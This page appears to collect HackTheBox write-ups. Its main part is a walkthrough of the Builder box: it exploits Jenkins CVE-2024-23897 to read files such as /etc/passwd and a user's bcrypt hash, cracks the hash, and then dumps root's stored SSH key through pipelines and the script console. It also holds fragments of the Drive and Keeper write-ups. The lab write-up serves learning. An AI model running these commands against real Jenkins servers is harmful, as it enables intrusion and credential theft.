RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Connecting to drive.htb on port 22: Done
[*] tom@drive.htb:
Distro Ubuntu 20.04
OS: linux
Arch: amd64
Version: 5.4.0
ASLR: Enabled
[+] Starting remote process bytearray(b'/home/tom/doodleGrive-cli') on drive.htb: pid 1743058
[*] Leak canary: 0x11875039814129743360
[*] Switching to interactive mode
# id
uid=0(root) gid=0(root) groups=0(root),1003(tom)
# cat /root/root.txt
641e7a5b************************
Builder is a neat box focused on a recent Jenkins vulnerability, CVE-2024-23897. It allows for partial file read and can lead to remote code execution. I’ll show how to exploit the vulnerability, explore methods to read as much of a file as possible, find a password hash for the admin user, and crack it to get access to Jenkins. From inside Jenkins, I’ll find a saved SSH key and show three paths to recover it. First, dumping an encrypted version from the admin panel. Second, using it to SSH into the host and finding a copy there. And third, having the pipeline leak the key back to me.
| Name | Builder Play on HackTheBox |
|---|---|
| Release Date | 12 Feb 2024 |
| Retire Date | 12 Feb 2024 |
| OS | Linux |
| Base Points | Medium [30] |
| | N/A (non-competitive) |
| | N/A (non-competitive) |
| Creators | |
nmap
finds two open TCP ports, SSH (22) and HTTP (8080):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.10
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-09 12:55 EST
Nmap scan report for 10.10.11.10
Host is up (0.094s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 6.90 seconds
oxdf@hacky$ nmap -p 22,8080 -sCV 10.10.11.10
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-09 12:55 EST
Nmap scan report for 10.10.11.10
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
8080/tcp open http Jetty 10.0.18
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(10.0.18)
|_http-title: Dashboard [Jenkins]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.35 seconds
Based on the OpenSSH version, the host is likely running Ubuntu 22.04 jammy.
There’s a robots.txt
file on the webserver on port 8080 disallowing bots from scanning any of the site. The page title indicates a Jenkins server. I’ve seen Jenkins before on HTB. Jeeves released in 2017, and Object was a part of the 2021 HackTheBox Uni CTF. I played with an RCE vulnerability in Jenkins (CVE-2019-1003000) on Jeeves in this 2019 blog post.
The site is a Jenkins instance:
The people tab shows one user, jennifer:
The build history is empty. The “Credentials” page shows some basic info:
There’s a single credential that is a root SSH private key:
I can’t get access to it.
The site is clearly Jenkins, which describes itself as:
The leading open source automation server, Jenkins provides hundreds of plugins to support building, deploying and automating any project.
As soon as I visit the page, the first request provides a JSESSIONID
cookie:
HTTP/1.1 200 OK
Date: Fri, 09 Feb 2024 18:21:41 GMT
Connection: close
X-Content-Type-Options: nosniff
Content-Type: text/html;charset=utf-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store,must-revalidate
X-Hudson-Theme: default
Referrer-Policy: same-origin
Cross-Origin-Opener-Policy: same-origin
Set-Cookie: JSESSIONID.680b9dc7=node0593121crjqec957avgei7j7h36.node0; Path=/; HttpOnly
X-Hudson: 1.395
X-Jenkins: 2.441
X-Jenkins-Session: 12cf4fc7
X-Frame-Options: sameorigin
X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuoLwaR1Kews72rSEsEkyDUFAKfX2Wk1mS06hi9A56Bx34LBdMQK3n6yCy0nJaT/KJcSx5hXA6DA1yNKWevPUO9nmgDZWaKxDhW/3uLvFtW68YnadxFiP7HLnRNulCWkaHgVIW/71MPrR9jOfjQ/BLPjBCBkLAdBsrCVrZ0/A/yj6H8YBGQIDk8hRjsqtMM0EBPzH/TylyC7DmHWtIkZqvLH7PKTycZ54Lcv9i9NVd/cLBZjEyzUua6n28OVsZif9yQ41qPmzwRlhZ7DAKi1wI48T+FatD9gz8v6KtjkftDht3CyT+GLYwUPy7z501y/RoOzldBpY2tgxvNTpIQgoDwIDAQAB
Content-Length: 14972
Server: Jetty(10.0.18)
That makes sense, as Jenkins is a Java application. The server is Jetty, a Java web server.
I’m going to skip the directory brute force given that I know exactly what this application is.
CVE-2024-23897 is the reason this box was released by HTB as a non-competitive box to showcase this hot vulnerability. It was first discussed mid-January 2024, with Jenkins publishing a Security Advisory on 24 January here. The title is “Arbitrary file read vulnerability through the CLI can lead to RCE”.
Jenkins has a CLI interface to control it from a scripted / automation / shell environment. In that, a feature was added where a @[filepath]
would be replaced with the contents of the file. This leads to a file read.
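The behavior can be modeled in a few lines of Python (a rough sketch of the argument expansion, with read_file as a stand-in for the real file I/O; the real args4j parser tokenizes slightly differently):

```python
# Model of the "@file" argument expansion behind CVE-2024-23897: any
# argument starting with '@' is replaced by the file's contents,
# roughly one argument per line.
def expand_args(args, read_file):
    out = []
    for a in args:
        if a.startswith("@"):
            out.extend(read_file(a[1:]).splitlines())
        else:
            out.append(a)
    return out

fake_fs = {"/etc/passwd": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:..."}
print(expand_args(["help", "@/etc/passwd"], fake_fs.get))
# ['help', 'root:x:0:0:root:/root:/bin/bash', 'daemon:x:1:1:...']
```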
The advisory shows five ways this can be leveraged into remote code execution, as well as some other abuses.
The Jenkins CLI documentation shows that you actually get the CLI JAR from the Jenkins instance. I’ll download it:
oxdf@hacky$ wget http://10.10.11.10:8080/jnlpJars/jenkins-cli.jar
--2024-02-09 14:18:41-- http://10.10.11.10:8080/jnlpJars/jenkins-cli.jar
Connecting to 10.10.11.10:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3623400 (3.5M) [application/java-archive]
Saving to: ‘jenkins-cli.jar’
jenkins-cli.jar 100%[====================>] 3.46M 3.34MB/s in 1.0s
2024-02-09 14:18:42 (3.34 MB/s) - ‘jenkins-cli.jar’ saved [3623400/3623400]
On running it, I’ll give it help
and then a non-existent command, and it prints all the commands:
oxdf@hacky$ java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' help 0xdf
add-job-to-view
Adds jobs to view.
build
Builds a job, and optionally waits until its completion.
cancel-quiet-down
Cancel the effect of the "quiet-down" command.
clear-queue
Clears the build queue.
connect-node
Reconnect to a node(s)
console
Retrieves console output of a build.
copy-job
Copies a job.
create-credentials-by-xml
Create Credential by XML
create-credentials-domain-by-xml
Create Credentials Domain by XML
create-job
Creates a new job by reading stdin as a configuration XML file.
create-node
Creates a new node by reading stdin as a XML configuration.
create-view
Creates a new view by reading stdin as a XML configuration.
declarative-linter
Validate a Jenkinsfile containing a Declarative Pipeline
delete-builds
Deletes build record(s).
delete-credentials
Delete a Credential
delete-credentials-domain
Delete a Credentials Domain
delete-job
Deletes job(s).
delete-node
Deletes node(s)
delete-view
Deletes view(s).
disable-job
Disables a job.
disable-plugin
Disable one or more installed plugins.
disconnect-node
Disconnects from a node.
enable-job
Enables a job.
enable-plugin
Enables one or more installed plugins transitively.
get-credentials-as-xml
Get a Credentials as XML (secrets redacted)
get-credentials-domain-as-xml
Get a Credentials Domain as XML
get-job
Dumps the job definition XML to stdout.
get-node
Dumps the node definition XML to stdout.
get-view
Dumps the view definition XML to stdout.
groovy
Executes the specified Groovy script.
groovysh
Runs an interactive groovy shell.
help
Lists all the available commands or a detailed description of single command.
import-credentials-as-xml
Import credentials as XML. The output of "list-credentials-as-xml" can be used as input here as is, the only needed change is to set the actual Secrets which are redacted in the output.
install-plugin
Installs a plugin either from a file, an URL, or from update center.
keep-build
Mark the build to keep the build forever.
list-changes
Dumps the changelog for the specified build(s).
list-credentials
Lists the Credentials in a specific Store
list-credentials-as-xml
Export credentials as XML. The output of this command can be used as input for "import-credentials-as-xml" as is, the only needed change is to set the actual Secrets which are redacted in the output.
list-credentials-context-resolvers
List Credentials Context Resolvers
list-credentials-providers
List Credentials Providers
list-jobs
Lists all jobs in a specific view or item group.
list-plugins
Outputs a list of installed plugins.
mail
Reads stdin and sends that out as an e-mail.
offline-node
Stop using a node for performing builds temporarily, until the next "online-node" command.
online-node
Resume using a node for performing builds, to cancel out the earlier "offline-node" command.
quiet-down
Quiet down Jenkins, in preparation for a restart. Don’t start any builds.
reload-configuration
Discard all the loaded data in memory and reload everything from file system. Useful when you modified config files directly on disk.
reload-job
Reload job(s)
remove-job-from-view
Removes jobs from view.
replay-pipeline
Replay a Pipeline build with edited script taken from standard input
restart
Restart Jenkins.
restart-from-stage
Restart a completed Declarative Pipeline build from a given stage.
safe-restart
Safe Restart Jenkins. Don’t start any builds.
safe-shutdown
Puts Jenkins into the quiet mode, wait for existing builds to be completed, and then shut down Jenkins.
session-id
Outputs the session ID, which changes every time Jenkins restarts.
set-build-description
Sets the description of a build.
set-build-display-name
Sets the displayName of a build.
shutdown
Immediately shuts down Jenkins server.
stop-builds
Stop all running builds for job(s)
update-credentials-by-xml
Update Credentials by XML
update-credentials-domain-by-xml
Update Credentials Domain by XML
update-job
Updates the job definition XML from stdin. The opposite of the get-job command.
update-node
Updates the node definition XML from stdin. The opposite of the get-node command.
update-view
Updates the view definition XML from stdin. The opposite of the get-view command.
version
Outputs the current version.
wait-node-offline
Wait for a node to become offline.
wait-node-online
Wait for a node to become online.
who-am-i
Reports your credential and permissions.
ERROR: No such command 0xdf. Available commands are above.
Other commands run as well:
oxdf@hacky$ java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' who-am-i
Authenticated as: anonymous
Authorities:
anonymous
From the advisory, I can try putting in a file reference:
It’s trying to load the lines of /etc/passwd
as arguments for the help command. The first line is taken as the command (the root
entry), and the next is an unexpected argument. That’s partial file read for sure. For one-line files, this is enough (adding an extra arg, in this case “a”, makes the output much shorter):
oxdf@hacky$ java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' help '@/etc/hostname' a
ERROR: Too many arguments: a
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: 0f52c222a4cc)
The hostname is “0f52c222a4cc”.
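What’s happening under the hood: the CLI parses arguments with the args4j library, which expands any `@<path>` argument into the lines of that file. A minimal Python sketch of that expansion (the real code is Java; `expand_at_files` is just my name for it):

```python
from pathlib import Path

def expand_at_files(args):
    """Mimic the args4j expandAtFiles behavior behind CVE-2024-23897:
    an argument of the form @<path> is replaced by that file's lines,
    each line becoming a separate argument."""
    expanded = []
    for arg in args:
        if arg.startswith("@"):
            expanded.extend(Path(arg[1:]).read_text().splitlines())
        else:
            expanded.append(arg)
    return expanded
```

So `help '@/etc/passwd' a` becomes `help <line1> <line2> ... a` — the first file line fills the COMMAND slot and gets echoed back in the error message, which is the leak.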
There are Python POCs out there on GitHub that do a similar thing. They don’t really add anything over the JAR file, so I prefer the JAR. Still, they do work and produce similar output:
oxdf@hacky$ python CVE-2024-23897/poc.py http://10.10.11.10:8080/ /etc/passwd
REQ: b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
RESPONSE: b'\x00\x00\x00\x00\x01\x08\n\x00\x00\x00K\x08ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n\x00\x00\x00\x1e\x08java -jar jenkins-cli.jar help\x00\x00\x00\n\x08 [COMMAND]\x00\x00\x00\x01\x08\n\x00\x00\x00N\x08Lists all the available commands or a detailed description of single command.\n\x00\x00\x00J\x08 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)\n\x00\x00\x00\x04\x04\x00\x00\x00\x02'
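Decoding that REQ blob shows the CLI protocol framing: each frame is a four-byte big-endian payload length, a one-byte opcode, and then the payload, with string payloads carrying their own two-byte length. The opcode meanings below (0 = argument, 1 = locale, 2 = encoding, 3 = start) are my inference from the POC’s bytes; a sketch that rebuilds the same request:

```python
import struct

def frame(opcode: int, data: bytes) -> bytes:
    # Each CLI frame: 4-byte big-endian payload length, 1-byte opcode, payload
    return struct.pack(">I", len(data)) + bytes([opcode]) + data

def string_frame(opcode: int, s: str) -> bytes:
    # String payloads are a 2-byte big-endian length followed by the bytes
    data = s.encode()
    return frame(opcode, struct.pack(">H", len(data)) + data)

OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3

req = (string_frame(OP_ARG, "help")
       + string_frame(OP_ARG, "@/etc/passwd")
       + string_frame(OP_ENCODING, "GBK")
       + string_frame(OP_LOCALE, "zh_CN")
       + frame(OP_START, b""))
print(req.hex())
```

Matching the captured REQ byte for byte confirms the framing; the response uses the same length-prefixed structure, which is why the POC can carve the leaked lines back out of the error text.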
In this video, I explore the vulnerability, walk through exploitation with both the JAR and the Python POC, and show the path to finding a method to leak more lines:
By the end of the video, I’ve got this output:
oxdf@hacky$ cat commands | while read command; do echo "echo -n \"$command: \"; java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' $command '@/etc/passwd' 2>&1 | grep -oP ':\d+:\d+:' | sort -u | wc -l"; done > ipp.sh
oxdf@hacky$ bash ipp.sh
add-job-to-view: 1
build: 1
cancel-quiet-down: 1
clear-queue: 1
connect-node: 19
console: 1
copy-job: 1
create-credentials-by-xml: 1
create-credentials-domain-by-xml: 1
create-job: 1
create-node: 2
create-view: 2
declarative-linter: 1
delete-builds: 1
delete-credentials: 1
delete-credentials-domain: 1
delete-job: 19
delete-node: 19
delete-view: 19
disable-job: 1
disable-plugin: 0
disconnect-node: 19
enable-job: 1
enable-plugin: 0
get-credentials-as-xml: 1
get-credentials-domain-as-xml: 1
get-job: 1
get-node: 1
get-view: 1
groovy: 0
groovysh: 0
help: 2
import-credentials-as-xml: 1
install-plugin: 0
keep-build: 1
list-changes: 1
list-credentials: 1
list-credentials-as-xml: 1
list-credentials-context-resolvers: 1
list-credentials-providers: 1
list-jobs: 2
list-plugins: 2
mail: 1
offline-node: 19
online-node: 19
quiet-down: 1
reload-configuration: 1
reload-job: 19
remove-job-from-view: 1
replay-pipeline: 1
restart: 1
restart-from-stage: 1
safe-restart: 1
safe-shutdown: 1
session-id: 1
set-build-description: 1
set-build-display-name: 1
shutdown: 1
stop-builds: 1
update-credentials-by-xml: 1
update-credentials-domain-by-xml: 1
update-job: 1
update-node: 1
update-view: 1
version: 1
wait-node-offline: 1
wait-node-online: 1
who-am-i: 1
All of the “19” results seem equally good.
I’ll look at the running command to get a feel for what the environment looks like for Jenkins. The command line (/proc/self/cmdline
, cleaned up with spaces added) is:
java -Duser.home=/var/jenkins_home -Djenkins.model.Jenkins.slaveAgentPort=50000 -Dhudson.lifecycle=hudson.lifecycle.ExitLifecycle -jar /usr/share/jenkins/jenkins.war
The environment variables (/proc/self/environ
) are:
HOSTNAME=0f52c222a4cc
JENKINS_UC_EXPERIMENTAL=https://updates.jenkins.io/experimental
JAVA_HOME=/opt/java/openjdk
JENKINS_INCREMENTALS_REPO_MIRROR=https://repo.jenkins-ci.org/incrementals
COPY_REFERENCE_FILE_LOG=/var/jenkins_home/copy_reference_file.log
PWD=/
JENKINS_SLAVE_AGENT_PORT=50000
JENKINS_VERSION=2.441
HOME=/var/jenkins_home
LANG=C.UTF-8
JENKINS_UC=https://updates.jenkins.io
SHLVL=0
JENKINS_HOME=/var/jenkins_home
REF=/usr/share/jenkins/ref
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
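Both of those /proc files are NUL-delimited blobs rather than newline-separated text, hence the cleanup. A quick sketch of what that cleanup does (sample bytes abridged from the real command line):

```python
def procfile_fields(raw: bytes) -> list[str]:
    """Split a NUL-delimited /proc blob (cmdline or environ) into strings."""
    return [f.decode() for f in raw.split(b"\x00") if f]

# abridged cmdline as it would come off disk
raw = b"java\x00-Duser.home=/var/jenkins_home\x00-jar\x00/usr/share/jenkins/jenkins.war\x00"
print(" ".join(procfile_fields(raw)))
```

For environ, joining with newlines instead of spaces gives one variable per line.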
I can actually read user.txt
at this point from the jenkins user’s home directory:
oxdf@hacky$ java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' help '@/var/jenkins_home/user.txt' a
ERROR: Too many arguments: a
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: ffcb78dc3a26226b97276f24e26fc272)
Jenkins stores the initial password for the admin user at /var/jenkins_home/secrets/initialAdminPassword
. Unfortunately, that returns “No such file”:
oxdf@hacky$ java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' help '@/var/jenkins_home/secrets/initialAdminPassword' a
ERROR: No such file: /var/jenkins_home/secrets/initialAdminPassword
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command
Jenkins stores information about its user accounts in /var/jenkins_home/users/users.xml
Using reload-job
, I’ll get the lines of that file, albeit a bit scrambled:
oxdf@hacky$ java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' reload-job '@/var/jenkins_home/users/users.xml'
<?xml version='1.1' encoding='UTF-8'?>: No such item ‘<?xml version='1.1' encoding='UTF-8'?>’ exists.
<string>jennifer_12108429903186576833</string>: No such item ‘ <string>jennifer_12108429903186576833</string>’ exists.
<idToDirectoryNameMap class="concurrent-hash-map">: No such item ‘ <idToDirectoryNameMap class="concurrent-hash-map">’ exists.
<entry>: No such item ‘ <entry>’ exists.
<string>jennifer</string>: No such item ‘ <string>jennifer</string>’ exists.
<version>1</version>: No such item ‘ <version>1</version>’ exists.
</hudson.model.UserIdMapper>: No such item ‘</hudson.model.UserIdMapper>’ exists.
</idToDirectoryNameMap>: No such item ‘ </idToDirectoryNameMap>’ exists.
<hudson.model.UserIdMapper>: No such item ‘<hudson.model.UserIdMapper>’ exists.
</entry>: No such item ‘ </entry>’ exists.
ERROR: Error occurred while performing this command, see previous stderr output.
Still, I can see a user “jennifer_12108429903186576833”, which matches the jennifer user on the site above. That is a directory name and in it will be a config.xml
:
oxdf@hacky$ java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' reload-job '@/var/jenkins_home/users/jennifer_12108429903186576833/config.xml'
<hudson.tasks.Mailer_-UserProperty plugin="mailer@463.vedf8358e006b_">: No such item ‘ <hudson.tasks.Mailer_-UserProperty plugin="mailer@463.vedf8358e006b_">’ exists.
<hudson.search.UserSearchProperty>: No such item ‘ <hudson.search.UserSearchProperty>’ exists.
<roles>: No such item ‘ <roles>’ exists.
<jenkins.security.seed.UserSeedProperty>: No such item ‘ <jenkins.security.seed.UserSeedProperty>’ exists.
</tokenStore>: No such item ‘ </tokenStore>’ exists.
</hudson.search.UserSearchProperty>: No such item ‘ </hudson.search.UserSearchProperty>’ exists.
<timeZoneName></timeZoneName>: No such item ‘ <timeZoneName></timeZoneName>’ exists.
<properties>: No such item ‘ <properties>’ exists.
<jenkins.security.LastGrantedAuthoritiesProperty>: No such item ‘ <jenkins.security.LastGrantedAuthoritiesProperty>’ exists.
<flags/>: No such item ‘ <flags/>’ exists.
<hudson.model.MyViewsProperty>: No such item ‘ <hudson.model.MyViewsProperty>’ exists.
</user>: No such item ‘</user>’ exists.
</jenkins.security.ApiTokenProperty>: No such item ‘ </jenkins.security.ApiTokenProperty>’ exists.
<views>: No such item ‘ <views>’ exists.
<string>authenticated</string>: No such item ‘ <string>authenticated</string>’ exists.
<org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.200.vb_9327d658781">: No such item ‘ <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.200.vb_9327d658781">’ exists.
<user>: No such item ‘<user>’ exists.
<name>all</name>: No such item ‘ <name>all</name>’ exists.
<description></description>: No such item ‘ <description></description>’ exists.
<emailAddress>jennifer@builder.htb</emailAddress>: No such item ‘ <emailAddress>jennifer@builder.htb</emailAddress>’ exists.
<collapsed/>: No such item ‘ <collapsed/>’ exists.
</jenkins.security.seed.UserSeedProperty>: No such item ‘ </jenkins.security.seed.UserSeedProperty>’ exists.
</org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>: No such item ‘ </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>’ exists.
</hudson.model.MyViewsProperty>: No such item ‘ </hudson.model.MyViewsProperty>’ exists.
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>: No such item ‘ <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>’ exists.
<filterQueue>false</filterQueue>: No such item ‘ <filterQueue>false</filterQueue>’ exists.
<jenkins.security.ApiTokenProperty>: No such item ‘ <jenkins.security.ApiTokenProperty>’ exists.
<primaryViewName></primaryViewName>: No such item ‘ <primaryViewName></primaryViewName>’ exists.
</views>: No such item ‘ </views>’ exists.
</hudson.model.TimeZoneProperty>: No such item ‘ </hudson.model.TimeZoneProperty>’ exists.
<com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@1319.v7eb_51b_3a_c97b_">: No such item ‘ <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@1319.v7eb_51b_3a_c97b_">’ exists.
</hudson.model.PaneStatusProperties>: No such item ‘ </hudson.model.PaneStatusProperties>’ exists.
</hudson.tasks.Mailer_-UserProperty>: No such item ‘ </hudson.tasks.Mailer_-UserProperty>’ exists.
<tokenList/>: No such item ‘ <tokenList/>’ exists.
<jenkins.console.ConsoleUrlProviderUserProperty/>: No such item ‘ <jenkins.console.ConsoleUrlProviderUserProperty/>’ exists.
</hudson.model.AllView>: No such item ‘ </hudson.model.AllView>’ exists.
<timestamp>1707318554385</timestamp>: No such item ‘ <timestamp>1707318554385</timestamp>’ exists.
<owner class="hudson.model.MyViewsProperty" reference="../../.."/>: No such item ‘ <owner class="hudson.model.MyViewsProperty" reference="../../.."/>’ exists.
</properties>: No such item ‘ </properties>’ exists.
</jenkins.model.experimentalflags.UserExperimentalFlagsProperty>: No such item ‘ </jenkins.model.experimentalflags.UserExperimentalFlagsProperty>’ exists.
</com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>: No such item ‘ </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>’ exists.
<hudson.security.HudsonPrivateSecurityRealm_-Details>: No such item ‘ <hudson.security.HudsonPrivateSecurityRealm_-Details>’ exists.
<insensitiveSearch>true</insensitiveSearch>: No such item ‘ <insensitiveSearch>true</insensitiveSearch>’ exists.
<properties class="hudson.model.View$PropertyList"/>: No such item ‘ <properties class="hudson.model.View$PropertyList"/>’ exists.
<hudson.model.TimeZoneProperty>: No such item ‘ <hudson.model.TimeZoneProperty>’ exists.
<hudson.model.AllView>: No such item ‘ <hudson.model.AllView>’ exists.
</hudson.security.HudsonPrivateSecurityRealm_-Details>: No such item ‘ </hudson.security.HudsonPrivateSecurityRealm_-Details>’ exists.
<providerId>default</providerId>: No such item ‘ <providerId>default</providerId>’ exists.
</roles>: No such item ‘ </roles>’ exists.
</jenkins.security.LastGrantedAuthoritiesProperty>: No such item ‘ </jenkins.security.LastGrantedAuthoritiesProperty>’ exists.
<jenkins.model.experimentalflags.UserExperimentalFlagsProperty>: No such item ‘ <jenkins.model.experimentalflags.UserExperimentalFlagsProperty>’ exists.
<hudson.model.PaneStatusProperties>: No such item ‘ <hudson.model.PaneStatusProperties>’ exists.
<?xml version='1.1' encoding='UTF-8'?>: No such item ‘<?xml version='1.1' encoding='UTF-8'?>’ exists.
<fullName>jennifer</fullName>: No such item ‘ <fullName>jennifer</fullName>’ exists.
<seed>6841d11dc1de101d</seed>: No such item ‘ <seed>6841d11dc1de101d</seed>’ exists.
<id>jennifer</id>: No such item ‘ <id>jennifer</id>’ exists.
<version>10</version>: No such item ‘ <version>10</version>’ exists.
<tokenStore>: No such item ‘ <tokenStore>’ exists.
<filterExecutors>false</filterExecutors>: No such item ‘ <filterExecutors>false</filterExecutors>’ exists.
<io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>: No such item ‘ <io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>’ exists.
<passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>: No such item ‘ <passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>’ exists.
ERROR: Error occurred while performing this command, see previous stderr output.
It’s scrambled, but the last line is:
<passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>
The hash matches multiple bcrypt formats. Running it through hashcat
without specifying a mode returns a request to pick one:
$ hashcat jennifer_hash test --user
hashcat (v6.2.6) starting in autodetect mode
...[-snip]...
The following 4 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
Please specify the hash-mode with -m [hash-mode].
I’m giving it --user
which treats “#jbcrypt” as the username.
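That works because --user splits each line on the first colon and keeps the right side as the hash, so the #jbcrypt tag is discarded as a username. In Python terms:

```python
# the line as extracted from config.xml, prefix and all
line = "#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a"
user, pw_hash = line.split(":", 1)  # split only on the first colon
print(user)     # the "#jbcrypt" tag, treated as a username
print(pw_hash)  # the bare bcrypt hash that hashcat actually attacks
```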
The basic bcrypt format works and cracks very quickly:
$ hashcat -m 3200 jennifer_hash --user /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
...[snip]...
$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a:princess
...[snip]...
I get the password “princess”, and this works to log into Jenkins as jennifer.
Even logged in, I still can’t directly access the private key for root. There is an update option now:
Going into it, there’s a place where the key would be, but it is “Concealed for Confidentiality”:
This is likely used by pipelines to SSH into the host system as root and deploy things.
Interestingly, it is there in a hidden form field (encrypted):
Under “Plugins” in “Manage Jenkins”, there are a few. Two of interest are the SSH Agent Plugin and the SSH Build Agents Plugin:
I’ll show a few ways to take this access to Jenkins and turn it into root access on Builder. All of them abuse the setup that has saved an SSH key into Jenkins. This is commonly done so that once the build process is complete, it can put artifacts (like a website) into place on the desired server.
flowchart TD;
A[root access\nto Jenkins]-->B(Decrypt SSH Key\nfrom Jenkins Admin);
A-->C(SSH Agent);
B-->D(root SSH access);
C-->E(Read SSH key\nfrom Host);
E-->D;
A-->F(Dump credential\nin pipeline);
F-->D;
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
I’m able to grab the base64 data from the hidden field and decrypt it very easily using the script console (from the main dashboard, go to “Manage Jenkins” -> Script Console):
On the main page, I’ll create a new job:
On the next page, I’ll give it a name and select Pipeline:
On the next screen, I’ll define the pipeline. I can leave most of it as is, and just fill in the “Pipeline script”. The “try sample pipeline” button will offer a starting format.
pipeline {
agent any
stages {
stage('Hello') {
steps {
echo 'Hello World'
}
}
}
}
If I save this and go back to the job page and click “Build Now”, the job runs. In the “Console Output” of the result, it shows the print:
These docs show how to use the SSH Agent plugin. I’ll paste in their POC as the pipeline:
node {
sshagent (credentials: ['deploy-dev']) {
sh 'ssh -o StrictHostKeyChecking=no -l cloudbees 192.168.1.106 uname -a'
}
}
I clearly need to change the IP. I’ll also need to change the “credential”. The docs show that it takes a list of strings. Trying with “root” fails:
Looking at the credential, it seems the ID is actually just “1”:
I’ll update to that:
And it works:
I’ve successfully run commands on the host.
I’ll update the command from uname -a
to find /root
. In this build, it returns a full read of all the files in /root
:
I could read root.txt
, but I’ll grab that SSH private key instead, changing the command to cat /root/.ssh/id_rsa
:
It’s the same key as the previous method.
If the pipeline can use the SSH key to get on to the host system as root, then it has access to the SSH key itself (I’ve already shown it can decrypt it). This post talks about dumping credentials. There’s a good bit in the post about how to get it to print the credential unmasked. With a bunch of attempts and troubleshooting, I end up with:
When I run that, it prints the SSH key.
Regardless of how I get it, with the recovered key (and permissions set to 600), I can SSH as root into Builder:
oxdf@hacky$ vim ~/keys/builder-root
oxdf@hacky$ chmod 600 ~/keys/builder-root
oxdf@hacky$ ssh -i ~/keys/builder-root root@10.10.11.10
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-94-generic x86_64)
...[snip]...
root@builder:~#
And get root.txt
:
root@builder:~# cat root.txt
a0957a94************************
Keeper is a relatively simple box focused on a helpdesk running Request Tracker and with an admin using KeePass. I’ll use default creds to get into the RT instance and find creds for a user in their profile. That user is troubleshooting a KeePass issue with a memory dump. I’ll exploit CVE-2023-32784 to get the master password from the dump, which provides access to a root SSH key in PuTTY format. I’ll convert it to OpenSSH format and get root access.
Name | Keeper Play on HackTheBox |
---|---|
Release Date | 12 Aug 2023 |
Retire Date | 10 Feb 2024 |
OS | Linux |
Base Points | Easy [20] |
Rated Difficulty | |
Radar Graph | |
00:08:18 | |
00:31:02 | |
Creator |
nmap
